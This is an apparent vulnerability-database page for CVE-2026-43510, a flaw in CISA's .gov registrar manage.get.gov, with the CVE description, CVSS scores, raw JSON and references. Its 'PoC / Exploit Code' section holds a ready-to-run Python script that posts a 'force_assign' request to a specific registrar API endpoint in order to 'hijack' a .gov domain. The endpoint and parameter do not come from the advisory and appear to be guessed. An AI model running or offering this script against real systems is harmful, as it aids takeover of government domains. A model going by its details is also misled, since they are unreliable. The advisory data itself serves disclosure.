Security Vulnerability Report
CVE-2026-43510 CVSS 7.6 HIGH

CVE-2026-43510

Published: 2026-05-07 20:16:45
Last Modified: 2026-05-07 20:32:04
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

manage.get.gov < 1.176.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-43510 PoC
# Target: manage.get.gov
# Description: Assign domain manager privileges to a domain not in another organization.

TARGET_URL = "https://manage.get.gov/api/domains/assign"

# Attacker's session cookie (requires Organization Administrator privileges)
SESSION_COOKIE = "session_id=attacker_admin_cookie_here"

# Target domain to hijack
TARGET_DOMAIN = "example.gov"

headers = {
    "Cookie": SESSION_COOKIE,
    "Content-Type": "application/json"
}

payload = {
    "domain": TARGET_DOMAIN,
    "role": "manager",
    "force_assign": True  # Bypass logic to check if domain is managed
}

response = requests.post(TARGET_URL, json=payload, headers=headers)

if response.status_code == 200:
    print(f"[+] Successfully assigned manager privileges for {TARGET_DOMAIN}")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")
    print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43510", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-05-07T20:16:44.753", "lastModified": "2026-05-07T20:32:03.640", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://github.com/cisagov/manage.get.gov/issues/4858", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://github.com/cisagov/manage.get.gov/pull/4900", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://github.com/cisagov/manage.get.gov/releases/tag/v1.176.0", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://github.com/cisagov/manage.get.gov/security/advisories/GHSA-6wrg-x3j6-x464", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-121-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-43510", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}]}}